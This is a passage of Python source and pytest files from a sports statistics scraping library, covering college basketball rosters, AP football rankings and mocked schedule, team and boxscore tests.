"""
Returns a ``float`` of the percentage of available rebounds the player
grabbed, both offensive and defensive. Percentage ranges from 0-100.
"""
return self._total_rebound_percentage
@_float_property_decorator
def assist_percentage(self):
"""
Returns a ``float`` of the percentage of field goals the player
assisted while on the floor. Percentage ranges from 0-100.
"""
return self._assist_percentage
@_float_property_decorator
def steal_percentage(self):
"""
Returns a ``float`` of the percentage of defensive possessions that
ended with the player stealing the ball while on the floor. Percentage
ranges from 0-100.
"""
return self._steal_percentage
@_float_property_decorator
def block_percentage(self):
"""
Returns a ``float`` of the percentage of opposing two-point field goal
attempts that were blocked by the player while on the floor. Percentage
ranges from 0-100.
"""
return self._block_percentage
@_float_property_decorator
def turnover_percentage(self):
"""
Returns a ``float`` of the average number of turnovers per 100
possessions by the player.
"""
return self._turnover_percentage
@_float_property_decorator
def usage_percentage(self):
"""
Returns a ``float`` of the percentage of plays the player is involved
in while on the floor. Percentage ranges from 0-100.
"""
return self._usage_percentage
@_float_property_decorator
def offensive_win_shares(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team as a result of his offensive plays.
"""
return self._offensive_win_shares
@_float_property_decorator
def defensive_win_shares(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team as a result of his defensive plays.
"""
return self._defensive_win_shares
@_float_property_decorator
def win_shares(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team as a result of his offensive and defensive plays.
"""
return self._win_shares
@_float_property_decorator
def win_shares_per_40_minutes(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team per 40 minutes of playtime. An average player has a contribution
of 0.100.
"""
return self._win_shares_per_40_minutes
@_float_property_decorator
def offensive_box_plus_minus(self):
"""
Returns a ``float`` of the number of offensive points per 100
possessions the player contributed in comparison to an average player
in the league.
"""
return self._offensive_box_plus_minus
@_float_property_decorator
def defensive_box_plus_minus(self):
"""
Returns a ``float`` of the number of defensive points per 100
possessions the player contributed in comparison to an average player
in the league.
"""
return self._defensive_box_plus_minus
@_float_property_decorator
def box_plus_minus(self):
"""
Returns a ``float`` of the total number of points per 100 possessions
the player contributed in comparison to an average player in the
league.
"""
return self._box_plus_minus
class Roster(object):
"""
Get stats for all players on a roster.
Request a team's roster for a given season and create an instance of the
Player class for each player, containing a detailed list of the player's
statistics and information.
Parameters
----------
team : string
The team's abbreviation, such as 'PURDUE' for the Purdue Boilermakers.
year : string (optional)
The 4-digit year to pull the roster from, such as '2018'. If left
blank, defaults to the most recent season.
"""
def __init__(self, team, year=None):
self._team = team
self._players = []
self._find_players(year)
def _pull_team_page(self, url):
"""
Download the team page.
Download the requested team's season page and create a PyQuery object.
Parameters
----------
url : string
A string of the built URL for the requested team and season.
Returns
-------
PyQuery object
Returns a PyQuery object of the team's HTML page.
"""
try:
return pq(url)
except HTTPError:
return None
def _create_url(self, year):
"""
Build the team URL.
Build a URL given a team's abbreviation and the 4-digit year.
Parameters
----------
year : string
The 4-digit string representing the year to pull the team's roster
from.
Returns
-------
string
Returns a string of the team's season page for the requested team
and year.
"""
return ROSTER_URL % (self._team.lower(), year)
def _get_id(self, player):
"""
Parse the player ID.
Given a PyQuery object representing a single player on the team roster,
parse the player ID and return it as a string.
Parameters
----------
player : PyQuery object
A PyQuery object representing the player information from the
roster table.
Returns
-------
string
Returns a string of the player ID.
"""
name_tag = player('th[data-stat="player"] a')
name = re.sub(r'.*/cbb/players/', '', str(name_tag))
return re.sub(r'\.html.*', '', name)
def _find_players(self, year):
"""
Find all player IDs for the requested team.
For the requested team and year (if applicable), pull the roster table
and parse the player ID for all players on the roster and create an
instance of the Player class for the player. All player instances are
added to the 'players' property to get all stats for all players on a
team.
Parameters
----------
year : string
The 4-digit string representing the year to pull the team's roster
from.
"""
if not year:
year = utils._find_year_for_season('ncaab')
url = self._create_url(year)
page = self._pull_team_page(url)
if not page:
output = ("Can't pull requested team page. Ensure the follow "
"URL exists: %s" % url)
raise ValueError(output)
players = page('table#roster tbody tr').items()
for player in players:
player_id = self._get_id(player)
player_instance = Player(player_id)
self._players.append(player_instance)
@property
def players(self):
"""
Returns a ``list`` of player instances for each player on the requested
team's roster.
"""
return self._players
```
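A similar sketch for the NCAAB classes above, assuming the file header's path maps to the import `sportsreference.ncaab.roster`; the player and team identifiers come from the docstrings above.
```python
from sportsreference.ncaab.roster import Player, Roster

edwards = Player('carsen-edwards-1')
print(edwards.name, edwards.points)       # career totals by default
print(edwards('2017-18').points)          # a single season's total

boilermakers = Roster('PURDUE')           # defaults to the latest season
print([p.name for p in boilermakers.players])
```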
#### File: sportsreference/ncaaf/rankings.py
```python
import re
from pyquery import PyQuery as pq
from .. import utils
from .constants import RANKINGS_SCHEME, RANKINGS_URL
from six.moves.urllib.error import HTTPError
class Rankings:
"""
Get all Associated Press (AP) rankings on a week-by-week basis.
Grab a list of the rankings published by the Associated Press to easily
query the hierarchy of teams each week. The results expose the current and
previous rankings as well as the movement for each team in the list.
Parameters
----------
year : string (optional)
A string of the requested year to pull rankings from. Defaults to the
most recent season.
"""
def __init__(self, year=None):
self._rankings = {}
self._find_rankings(year)
def _pull_rankings_page(self, year):
"""
Download the rankings page.
Download the rankings page for the requested year and create a PyQuery
object.
Parameters
----------
year : string
A string of the requested year to pull rankings from.
Returns
-------
PyQuery object
Returns a PyQuery object of the rankings HTML page.
"""
try:
return pq(RANKINGS_URL % year)
except HTTPError:
return None
def _get_team(self, team):
"""
Retrieve team's name and abbreviation.
The team's name and abbreviation are embedded within the 'school_name'
tag and, in the case of the abbreviation, require special parsing as it
is located in the middle of a URI. The name and abbreviation are
returned for the requested school.
Parameters
----------
team : PyQuery object
A PyQuery object representing a single row in a table on the
rankings page.
Returns
-------
tuple (string, string)
Returns a tuple of two strings where the first string is the team's
abbreviation, such as 'PURDUE' and the second string is the team's
name, such as 'Purdue'.
"""
name_tag = team('td[data-stat="school_name"]')
abbreviation = re.sub(r'.*/cfb/schools/', '', str(name_tag('a')))
abbreviation = re.sub(r'/.*', '', abbreviation)
name = team('td[data-stat="school_name"] a').text()
return abbreviation, name
def _find_rankings(self, year):
"""
Retrieve the rankings for each week.
Find and retrieve all AP rankings for the requested year and combine
them on a per-week basis. Each week contains information about the
name, abbreviation, rank, movement, and previous rank for each team
as well as the date and week number the results were published on.
Parameters
----------
year : string
A string of the requested year to pull rankings from.
"""
if not year:
year = utils._find_year_for_season('ncaaf')
page = self._pull_rankings_page(year)
if not page:
output = ("Can't pull rankings page. Ensure the following URL "
"exists: %s" % RANKINGS_URL)
raise ValueError(output)
rankings = page('table#ap tbody tr').items()
weekly_rankings = []
week = 0
for team in rankings:
if 'class="thead"' in str(team):
self._rankings[int(week)] = weekly_rankings
weekly_rankings = []
continue
abbreviation, name = self._get_team(team)
rank = utils._parse_field(RANKINGS_SCHEME, team, 'rank')
week = utils._parse_field(RANKINGS_SCHEME, team, 'week')
date = utils._parse_field(RANKINGS_SCHEME, team, 'date')
previous = utils._parse_field(RANKINGS_SCHEME, team, 'previous')
change = utils._parse_field(RANKINGS_SCHEME, team, 'change')
if 'decrease' in str(team(RANKINGS_SCHEME['change'])):
change = int(change) * -1
elif 'increase' in str(team(RANKINGS_SCHEME['change'])):
try:
change = int(change)
except ValueError:
change = 0
else:
change = 0
rank_details = {
'abbreviation': abbreviation,
'name': name,
'rank': int(rank),
'week': int(week),
'date': date,
'previous': previous,
'change': change
}
weekly_rankings.append(rank_details)
# Add the final week's rankings, which are not terminated by another
# header row and hence never hit the first if statement in the loop above.
self._rankings[int(week)] = weekly_rankings
@property
def current_extended(self):
"""
Returns a ``list`` of ``dictionaries`` of the most recent AP rankings.
The list is ordered in terms of the ranking so the #1 team will be in
the first element and the #25 team will be the last element. Each
dictionary has the following structure::
{
'abbreviation': Team's abbreviation, such as 'PURDUE' (str),
'name': Team's full name, such as 'Purdue' (str),
'rank': Team's rank for the current week (int),
'week': Week number for the results, such as 19 (int),
'date': Date the rankings were released, such as '2017-03-01'.
Can also be 'Final' for the final rankings or
'Preseason' for preseason rankings (str),
'previous': The team's previous rank, if applicable (str),
'change': The amount the team moved up or down the rankings.
Moves up the ladder have a positive number while
drops yield a negative number and teams that didn't
move have 0 (int)
}
"""
latest_week = max(self._rankings.keys())
ordered_dict = sorted(self._rankings[latest_week],
key=lambda k: k['rank'])
return ordered_dict
@property
def current(self):
"""
Returns a ``dictionary`` of the most recent rankings from the
Associated Press where each key is a ``string`` of the team's
abbreviation and each value is an ``int`` of the team's rank for the
current week.
"""
rankings_dict = {}
for team in self.current_extended:
rankings_dict[team['abbreviation']] = team['rank']
return rankings_dict
@property
def complete(self):
"""
Returns a ``dictionary`` where each key is a week number as an ``int``
and each value is a ``list`` of ``dictionaries`` containing the AP
rankings for each week. Within each list is a dictionary of team
information such as name, abbreviation, rank, and more. Note that the
list might not necessarily be in the same order as the rankings.
The overall dictionary has the following structure::
{
week number, ie 16 (int): [
{
'abbreviation': Team's abbreviation, such as 'PURDUE'
(str),
'name': Team's full name, such as 'Purdue' (str),
'rank': Team's rank for the current week (int),
'week': Week number for the results, such as 16 (int),
'date': Date the rankings were released, such as
'2017-12-03'. Can also be 'Final' for the final
rankings or 'Preseason' for preseason rankings
(str),
'previous': The team's previous rank, if applicable
(str),
'change': The amount the team moved up or down the
rankings. Moves up the ladder have a positive
number while drops yield a negative number
and teams that didn't move have 0 (int)
},
...
],
...
}
"""
return self._rankings
```
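A minimal sketch of the `Rankings` class above, assuming the import path `sportsreference.ncaaf.rankings`; output values shown in the comments are illustrative.
```python
from sportsreference.ncaaf.rankings import Rankings

rankings = Rankings('2017')    # omit the year to use the current season
print(rankings.current)        # mapping of abbreviation -> rank, e.g. {'PURDUE': ...}
for team in rankings.current_extended:
    print(team['rank'], team['name'], team['change'])
print(sorted(rankings.complete.keys()))    # every published week number
```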
#### File: integration/schedule/test_mlb_schedule.py
```python
import mock
import os
import pandas as pd
import pytest
from datetime import datetime
from flexmock import flexmock
from sportsreference import utils
from sportsreference.constants import AWAY, HOME, LOSS, WIN
from sportsreference.mlb.boxscore import Boxscore
from sportsreference.mlb.constants import DAY, NIGHT, SCHEDULE_URL
from sportsreference.mlb.schedule import Schedule
MONTH = 4
YEAR = 2017
NUM_GAMES_IN_SCHEDULE = 162
def read_file(filename):
filepath = os.path.join(os.path.dirname(__file__), 'mlb', filename)
return open('%s' % filepath, 'r').read()
def mock_pyquery(url):
class MockPQ:
def __init__(self, html_contents):
self.status_code = 200
self.html_contents = html_contents
self.text = html_contents
def __call__(self, div):
return read_file('table.html')
schedule = read_file('%s-schedule-scores.html' % YEAR)
return MockPQ(schedule)
class MockDateTime:
def __init__(self, year, month):
self.year = year
self.month = month
class TestMLBSchedule:
@mock.patch('requests.get', side_effect=mock_pyquery)
def setup_method(self, *args, **kwargs):
self.results = {
'game': 2,
'boxscore_index': 'TBA/TBA201704040',
'date': 'Tuesday, Apr 4',
'datetime': datetime(2017, 4, 4),
'game_number_for_day': 1,
'location': AWAY,
'opponent_abbr': 'TBR',
'result': WIN,
'runs_scored': 5,
'runs_allowed': 0,
'innings': 9,
'record': '1-1',
'rank': 3,
'games_behind': 0.5,
'winner': 'Sabathia',
'loser': 'Odorizzi',
'save': None,
'game_duration': '3:07',
'day_or_night': NIGHT,
'attendance': 19366,
'streak': '+'
}
flexmock(Boxscore) \
.should_receive('_parse_game_data') \
.and_return(None)
flexmock(utils) \
.should_receive('_todays_date') \
.and_return(MockDateTime(YEAR, MONTH))
self.schedule = Schedule('NYY')
def test_mlb_schedule_returns_correct_number_of_games(self):
assert len(self.schedule) == NUM_GAMES_IN_SCHEDULE
def test_mlb_schedule_returns_requested_match_from_index(self):
match_two = self.schedule[1]
for attribute, value in self.results.items():
assert getattr(match_two, attribute) == value
def test_mlb_schedule_returns_requested_match_from_date(self):
match_two = self.schedule(datetime(2017, 4, 4))
for attribute, value in self.results.items():
assert getattr(match_two, attribute) == value
def test_mlb_schedule_returns_second_game_in_double_header(self):
match_two = self.schedule(datetime(2017, 5, 14), 2)
results = {
'game': 35,
'date': 'Sunday, May 14 (2)',
'datetime': datetime(2017, 5, 14),
'game_number_for_day': 2,
'location': HOME,
'opponent_abbr': 'HOU',
'result': LOSS,
'runs_scored': 7,
'runs_allowed': 10,
'innings': 9,
'record': '22-13',
'rank': 1,
'games_behind': -0.5,
'winner': 'Morton',
'loser': 'Tanaka',
'save': None,
'game_duration': '3:49',
'day_or_night': NIGHT,
'attendance': 47883,
'streak': '-'
}
for attribute, value in results.items():
assert getattr(match_two, attribute) == value
def test_mlb_schedule_dataframe_returns_dataframe(self):
df = pd.DataFrame([self.results], index=['NYY'])
match_two = self.schedule[1]
# Pandas doesn't natively allow comparisons of DataFrames.
# Concatenating the two DataFrames (the one generated during the test
# and the expected one above) and dropping duplicate rows leaves only
# the rows that are unique between the two frames. This allows a quick
# check of the DataFrame to see if it is empty - if so, all rows are
# duplicates, and they are equal.
frames = [df, match_two.dataframe]
df1 = pd.concat(frames).drop_duplicates(keep=False)
assert df1.empty
def test_mlb_schedule_dataframe_extended_returns_dataframe(self):
df = pd.DataFrame([{'key': 'value'}])
flexmock(Boxscore) \
.should_receive('dataframe') \
.and_return(pd.DataFrame([{'key': 'value'}]))
result = self.schedule[1].dataframe_extended
frames = [df, result]
df1 = pd.concat(frames).drop_duplicates(keep=False)
assert df1.empty
def test_mlb_schedule_all_dataframe_returns_dataframe(self):
flexmock(Boxscore) \
.should_receive('dataframe') \
.and_return(pd.DataFrame([{'key': 'value'}]))
result = self.schedule.dataframe.drop_duplicates(keep=False)
assert len(result) == NUM_GAMES_IN_SCHEDULE
assert set(result.columns.values) == set(self.results.keys())
def test_mlb_schedule_all_dataframe_extended_returns_dataframe(self):
flexmock(Boxscore) \
.should_receive('dataframe') \
.and_return(pd.DataFrame([{'key': 'value'}]))
result = self.schedule.dataframe_extended
assert len(result) == NUM_GAMES_IN_SCHEDULE
def test_no_games_for_date_raises_value_error(self):
with pytest.raises(ValueError):
self.schedule(datetime.now())
```
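The comment in the dataframe tests above relies on a concat-and-drop-duplicates trick to compare DataFrames. A minimal standalone sketch of the same check, using only pandas (the column names are illustrative):
```python
import pandas as pd

a = pd.DataFrame([{'runs_scored': 5, 'runs_allowed': 0}], index=['NYY'])
b = pd.DataFrame([{'runs_scored': 5, 'runs_allowed': 0}], index=['NYY'])

# Equal frames: every row appears twice, so keep=False drops them all and
# an empty result signals equality.
assert pd.concat([a, b]).drop_duplicates(keep=False).empty

# A differing frame leaves both mismatched rows behind.
c = pd.DataFrame([{'runs_scored': 7, 'runs_allowed': 0}], index=['NYY'])
assert len(pd.concat([a, c]).drop_duplicates(keep=False)) == 2
```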
#### File: integration/schedule/test_ncaab_schedule.py
```python
import mock
import os
import pandas as pd
import pytest
from datetime import datetime
from flexmock import flexmock
from sportsreference import utils
from sportsreference.constants import NEUTRAL, REGULAR_SEASON, WIN
from sportsreference.ncaab.boxscore import Boxscore
from sportsreference.ncaab.constants import SCHEDULE_URL
from sportsreference.ncaab.schedule import Schedule
MONTH = 11
YEAR = 2017
NUM_GAMES_IN_SCHEDULE = 39
def read_file(filename):
filepath = os.path.join(os.path.dirname(__file__), 'ncaab', filename)
return open('%s' % filepath, 'r').read()
def mock_pyquery(url):
class MockPQ:
def __init__(self, html_contents):
self.status_code = 200
self.html_contents = html_contents
self.text = html_contents
def __call__(self, div):
return read_file('table.html')
schedule = read_file('%s-schedule.html' % (YEAR + 1))
return MockPQ(schedule)
class MockDateTime:
def __init__(self, year, month):
self.year = year
self.month = month
class TestNCAABSchedule:
@mock.patch('requests.get', side_effect=mock_pyquery)
def setup_method(self, *args, **kwargs):
self.results = {
'game': 2,
'boxscore_index': '2017-11-14-21-kansas',
'date': 'Tue, Nov 14, 2017',
'time': '9:30 pm/est',
'datetime': datetime(2017, 11, 14, 21, 30),
'type': REGULAR_SEASON,
'location': NEUTRAL,
'opponent_abbr': 'kentucky',
'opponent_name': 'Kentucky',
'opponent_rank': 7,
'opponent_conference': 'SEC',
'result': WIN,
'points_for': 65,
'points_against': 61,
'overtimes': 0,
'season_wins': 2,
'season_losses': 0,
'streak': 'W 2',
'arena': 'United Center'
}
flexmock(utils) \
.should_receive('_todays_date') \
.and_return(MockDateTime(YEAR, MONTH))
self.schedule = Schedule('KANSAS')
def test_ncaab_schedule_returns_correct_number_of_games(self):
assert len(self.schedule) == NUM_GAMES_IN_SCHEDULE
def test_ncaab_schedule_returns_requested_match_from_index(self):
match_two = self.schedule[1]
for attribute, value in self.results.items():
assert getattr(match_two, attribute) == value
def test_ncaab_schedule_returns_requested_match_from_date(self):
match_two = self.schedule(datetime(2017, 11, 14))
for attribute, value in self.results.items():
assert getattr(match_two, attribute) == value
def test_ncaab_schedule_dataframe_returns_dataframe(self):
df = pd.DataFrame([self.results], index=['KANSAS'])
match_two = self.schedule[1]
# Pandas doesn't natively allow comparisons of DataFrames.
# Concatenating the two DataFrames (the one generated during the test
# and the expected one above) and dropping duplicate rows leaves only
# the rows that are unique between the two frames. This allows a quick
# check of the DataFrame to see if it is empty - if so, all rows are
# duplicates, and they are equal.
frames = [df, match_two.dataframe]
df1 = pd.concat(frames).drop_duplicates(keep=False)
assert df1.empty
def test_ncaab_schedule_dataframe_extended_returns_dataframe(self):
df = pd.DataFrame([{'key': 'value'}])
flexmock(Boxscore) \
.should_receive('dataframe') \
.and_return(pd.DataFrame([{'key': 'value'}]))
result = self.schedule[1].dataframe_extended
frames = [df, result]
df1 = pd.concat(frames).drop_duplicates(keep=False)
assert df1.empty
def test_ncaab_schedule_all_dataframe_returns_dataframe(self):
flexmock(Boxscore) \
.should_receive('_parse_game_data') \
.and_return(None)
flexmock(Boxscore) \
.should_receive('dataframe') \
.and_return(pd.DataFrame([{'key': 'value'}]))
result = self.schedule.dataframe.drop_duplicates(keep=False)
assert len(result) == NUM_GAMES_IN_SCHEDULE
assert set(result.columns.values) == set(self.results.keys())
def test_ncaab_schedule_all_dataframe_extended_returns_dataframe(self):
flexmock(Boxscore) \
.should_receive('_parse_game_data') \
.and_return(None)
flexmock(Boxscore) \
.should_receive('dataframe') \
.and_return(pd.DataFrame([{'key': 'value'}]))
result = self.schedule.dataframe_extended
assert len(result) == NUM_GAMES_IN_SCHEDULE
def test_no_games_for_date_raises_value_error(self):
with pytest.raises(ValueError):
self.schedule(datetime.now())
```
#### File: integration/teams/test_nba_integration.py
```python
import mock
import os
import pandas as pd
import pytest
from flexmock import flexmock
from sportsreference import utils
from sportsreference.nba.constants import SEASON_PAGE_URL
from sportsreference.nba.teams import Teams
MONTH = 1
YEAR = 2017
def read_file(filename):
filepath = os.path.join(os.path.dirname(__file__), 'nba_stats', filename)
return open('%s' % filepath, 'r').read()
def mock_pyquery(url):
class MockPQ:
def __init__(self, html_contents):
self.status_code = 200
self.html_contents = html_contents
self.text = html_contents
def __call__(self, div):
if div == 'div#all_team-stats-base':
return read_file('%s_team.html' % YEAR)
else:
return read_file('%s_opponent.html' % YEAR)
html_contents = read_file('NBA_%s.html' % YEAR)
return MockPQ(html_contents)
class MockDateTime:
def __init__(self, year, month):
self.year = year
self.month = month
class TestNBAIntegration:
@mock.patch('requests.get', side_effect=mock_pyquery)
def setup_method(self, *args, **kwargs):
self.results = {
'rank': 26,
'abbreviation': 'DET',
'name': '<NAME>',
'games_played': 82,
'minutes_played': 19805,
'field_goals': 3269,
'field_goal_attempts': 7282,
'field_goal_percentage': .449,
'three_point_field_goals': 631,
'three_point_field_goal_attempts': 1915,
'three_point_field_goal_percentage': .330,
'two_point_field_goals': 2638,
'two_point_field_goal_attempts': 5367,
'two_point_field_goal_percentage': .492,
'free_throws': 1140,
'free_throw_attempts': 1586,
'free_throw_percentage': .719,
'offensive_rebounds': 908,
'defensive_rebounds': 2838,
'total_rebounds': 3746,
'assists': 1732,
'steals': 574,
'blocks': 310,
'turnovers': 973,
'personal_fouls': 1467,
'points': 8309,
'opp_field_goals': 3144,
'opp_field_goal_attempts': 6830,
'opp_field_goal_percentage': .460,
'opp_three_point_field_goals': 767,
'opp_three_point_field_goal_attempts': 2098,
'opp_three_point_field_goal_percentage': .366,
'opp_two_point_field_goals': 2377,
'opp_two_point_field_goal_attempts': 4732,
'opp_two_point_field_goal_percentage': .502,
'opp_free_throws': 1346,
'opp_free_throw_attempts': 1726,
'opp_free_throw_percentage': .780,
'opp_offensive_rebounds': 656,
'opp_defensive_rebounds': 2861,
'opp_total_rebounds': 3517,
'opp_assists': 1929,
'opp_steals': 551,
'opp_blocks': 339,
'opp_turnovers': 1046,
'opp_personal_fouls': 1434,
'opp_points': 8401
}
self.abbreviations = [
'BOS', 'CLE', 'TOR', 'WAS', 'ATL', 'MIL', 'IND', 'CHI', 'MIA',
'DET', 'CHO', 'NYK', 'ORL', 'PHI', 'BRK', 'GSW', 'SAS', 'HOU',
'LAC', 'UTA', 'OKC', 'MEM', 'POR', 'DEN', 'NOP', 'DAL', 'SAC',
'MIN', 'LAL', 'PHO'
]
flexmock(utils) \
.should_receive('_todays_date') \
.and_return(MockDateTime(YEAR, MONTH))
self.teams = Teams()
def test_nba_integration_returns_correct_number_of_teams(self):
assert len(self.teams) == len(self.abbreviations)
def test_nba_integration_returns_correct_attributes_for_team(self):
detroit = self.teams('DET')
for attribute, value in self.results.items():
assert getattr(detroit, attribute) == value
def test_nba_integration_returns_correct_team_abbreviations(self):
for team in self.teams:
assert team.abbreviation in self.abbreviations
def test_nba_integration_dataframe_returns_dataframe(self):
df = pd.DataFrame([self.results], index=['DET'])
detroit = self.teams('DET')
# Pandas doesn't natively allow comparisons of DataFrames.
# Concatenating the two DataFrames (the one generated during the test
# and the expected one above) and dropping duplicate rows leaves only
# the rows that are unique between the two frames. This allows a quick
# check of the DataFrame to see if it is empty - if so, all rows are
# duplicates, and they are equal.
frames = [df, detroit.dataframe]
df1 = pd.concat(frames).drop_duplicates(keep=False)
assert df1.empty
def test_nba_integration_all_teams_dataframe_returns_dataframe(self):
result = self.teams.dataframes.drop_duplicates(keep=False)
assert len(result) == len(self.abbreviations)
assert set(result.columns.values) == set(self.results.keys())
def test_nba_invalid_team_name_raises_value_error(self):
with pytest.raises(ValueError):
self.teams('INVALID_NAME')
```
#### File: tests/unit/test_ncaab_teams.py
```python
from flexmock import flexmock
from mock import PropertyMock
from sportsreference.ncaab.schedule import Schedule
from sportsreference.ncaab.teams import Team
class TestNCAABTeams:
def test_ncaab_schedule_returns_schedule(self, *args, **kwargs):
flexmock(Team) \
.should_receive('_parse_team_data') \
.and_return(None)
flexmock(Schedule) \
.should_receive('_pull_schedule') \
.and_return(None)
team = Team(None, 1)
assert len(team.schedule) == 0
def test_two_point_field_goal_percentage_returns_default(self):
flexmock(Team) \
.should_receive('_parse_team_data') \
.and_return(None)
flexmock(Schedule) \
.should_receive('_pull_schedule') \
.and_return(None)
team = Team(None, 1)
mock_field_goals = PropertyMock(return_value=0)
type(team).two_point_field_goals = mock_field_goals
type(team).two_point_field_goal_attempts = mock_field_goals
result = team.two_point_field_goal_percentage
assert result == 0.0
def test_opp_two_point_field_goal_percentage_returns_default(self):
flexmock(Team) \
.should_receive('_parse_team_data') \
.and_return(None)
flexmock(Schedule) \
.should_receive('_pull_schedule') \
.and_return(None)
team = Team(None, 1)
mock_field_goals = PropertyMock(return_value=0)
type(team).opp_two_point_field_goals = mock_field_goals
type(team).opp_two_point_field_goal_attempts = mock_field_goals
result = team.opp_two_point_field_goal_percentage
assert result == 0.0
```
#### File: tests/unit/test_nfl_schedule.py
```python
from flexmock import flexmock
from mock import PropertyMock
from sportsreference.constants import (AWAY,
HOME,
LOSS,
NEUTRAL,
POST_SEASON,
REGULAR_SEASON,
WIN)
from sportsreference.nfl.constants import (CONF_CHAMPIONSHIP,
DIVISION,
SUPER_BOWL,
WILD_CARD)
from sportsreference.nfl.schedule import Game, Schedule
YEAR = 2017
class TestNFLSchedule:
def setup_method(self, *args, **kwargs):
flexmock(Game) \
.should_receive('_parse_game_data') \
.and_return(None)
self.game = Game(None, REGULAR_SEASON, YEAR)
def test_away_game_returns_away_location(self):
fake_location = PropertyMock(return_value='@')
type(self.game)._location = fake_location
assert self.game.location == AWAY
def test_home_game_returns_home_location(self):
fake_location = PropertyMock(return_value='')
type(self.game)._location = fake_location
assert self.game.location == HOME
def test_neutral_game_returns_neutral_location(self):
fake_location = PropertyMock(return_value='N')
type(self.game)._location = fake_location
assert self.game.location == NEUTRAL
def test_winning_result_returns_win(self):
fake_result = PropertyMock(return_value='W')
type(self.game)._result = fake_result
assert self.game.result == WIN
def test_losing_result_returns_loss(self):
fake_result = PropertyMock(return_value='L')
type(self.game)._result = fake_result
assert self.game.result == LOSS
def test_overtime_returns_overtime(self):
fake_overtime = PropertyMock(return_value='OT')
type(self.game)._overtime = fake_overtime
assert self.game.overtime
def test_no_overtime_returns_none(self):
fake_overtime = PropertyMock(return_value='')
type(self.game)._overtime = fake_overtime
assert not self.game.overtime
def test_regular_season_type(self):
assert self.game.type == REGULAR_SEASON
def test_playoff_type(self):
game = Game(None, POST_SEASON, YEAR)
assert game.type == POST_SEASON
def test_wild_card_game_returns_wild_card(self):
fake_week = PropertyMock(return_value='Wild Card')
type(self.game)._week = fake_week
assert self.game.week == WILD_CARD
def test_division_playoff_game_returns_division(self):
fake_week = PropertyMock(return_value='Division')
type(self.game)._week = fake_week
assert self.game.week == DIVISION
    def test_conference_championship_returns_conference_championship(self):
fake_week = PropertyMock(return_value='Conf. Champ.')
type(self.game)._week = fake_week
assert self.game.week == CONF_CHAMPIONSHIP
def test_super_bowl_returns_super_bowl(self):
fake_week = PropertyMock(return_value='SuperBowl')
type(self.game)._week = fake_week
assert self.game.week == SUPER_BOWL
def test_empty_game_class_returns_dataframe_of_none(self):
assert self.game._points_scored is None
assert self.game._points_allowed is None
assert self.game.dataframe is None
def test_no_dataframes_returns_none(self):
flexmock(Schedule) \
.should_receive('_pull_schedule') \
.and_return(None)
schedule = Schedule('DET')
fake_game = flexmock(dataframe=None)
fake_games = PropertyMock(return_value=fake_game)
type(schedule).__iter__ = fake_games
assert schedule.dataframe is None
def test_no_dataframes_extended_returns_none(self):
flexmock(Schedule) \
.should_receive('_pull_schedule') \
.and_return(None)
schedule = Schedule('DET')
fake_game = flexmock(dataframe_extended=None)
fake_games = PropertyMock(return_value=fake_game)
type(schedule).__iter__ = fake_games
assert schedule.dataframe_extended is None
```
#### File: tests/unit/test_nhl_boxscore.py
```python
from flexmock import flexmock
from mock import patch, PropertyMock
from pyquery import PyQuery as pq
from sportsreference import utils
from sportsreference.constants import AWAY, HOME
from sportsreference.nhl.boxscore import Boxscore, Boxscores
import os

# read_file and BOXSCORE are referenced below but were missing from this
# file; minimal stand-ins are defined here (the fixture name and directory
# are assumed placeholders, following the pattern of the other test files).
BOXSCORE = 'boxscore'

def read_file(filename):
    filepath = os.path.join(os.path.dirname(__file__), 'nhl', filename)
    return open(filepath, 'r').read()
class MockField:
def __init__(self, field):
self._field = field
def text(self):
return self._field
class MockBoxscoreData:
def __init__(self, fields):
self._fields = fields
def __call__(self, field):
return self
def items(self):
return [self._fields]
class MockName:
def __init__(self, name):
self._name = name
def text(self):
return self._name
def mock_pyquery(url):
class MockPQ:
def __init__(self, html_contents):
self.status_code = 404
self.html_contents = html_contents
self.text = html_contents
boxscore = read_file('%s.html' % BOXSCORE)
return MockPQ(boxscore)
class TestNHLBoxscore:
@patch('requests.get', side_effect=mock_pyquery)
def setup_method(self, *args, **kwargs):
flexmock(Boxscore) \
.should_receive('_parse_game_data') \
.and_return(None)
self.boxscore = Boxscore(None)
def test_away_team_wins(self):
fake_away_goals = PropertyMock(return_value=4)
fake_home_goals = PropertyMock(return_value=3)
type(self.boxscore)._away_goals = fake_away_goals
type(self.boxscore)._home_goals = fake_home_goals
assert self.boxscore.winner == AWAY
def test_home_team_wins(self):
fake_away_goals = PropertyMock(return_value=3)
fake_home_goals = PropertyMock(return_value=4)
type(self.boxscore)._away_goals = fake_away_goals
type(self.boxscore)._home_goals = fake_home_goals
assert self.boxscore.winner == HOME
def test_winning_name_is_home(self):
expected_name = 'Home Name'
fake_winner = PropertyMock(return_value=HOME)
fake_home_name = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._home_name = fake_home_name
assert self.boxscore.winning_name == expected_name
def test_winning_name_is_away(self):
expected_name = 'Away Name'
fake_winner = PropertyMock(return_value=AWAY)
fake_away_name = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._away_name = fake_away_name
assert self.boxscore.winning_name == expected_name
def test_winning_abbr_is_home(self):
expected_name = 'HOME'
flexmock(utils) \
.should_receive('_parse_abbreviation') \
.and_return(expected_name)
fake_winner = PropertyMock(return_value=HOME)
fake_home_abbr = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._home_abbr = fake_home_abbr
assert self.boxscore.winning_abbr == expected_name
def test_winning_abbr_is_away(self):
expected_name = 'AWAY'
flexmock(utils) \
.should_receive('_parse_abbreviation') \
.and_return(expected_name)
fake_winner = PropertyMock(return_value=AWAY)
fake_away_abbr = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._away_abbr = fake_away_abbr
assert self.boxscore.winning_abbr == expected_name
def test_losing_name_is_home(self):
expected_name = 'Home Name'
fake_winner = PropertyMock(return_value=AWAY)
fake_home_name = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._home_name = fake_home_name
assert self.boxscore.losing_name == expected_name
def test_losing_name_is_away(self):
expected_name = 'Away Name'
fake_winner = PropertyMock(return_value=HOME)
fake_away_name = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
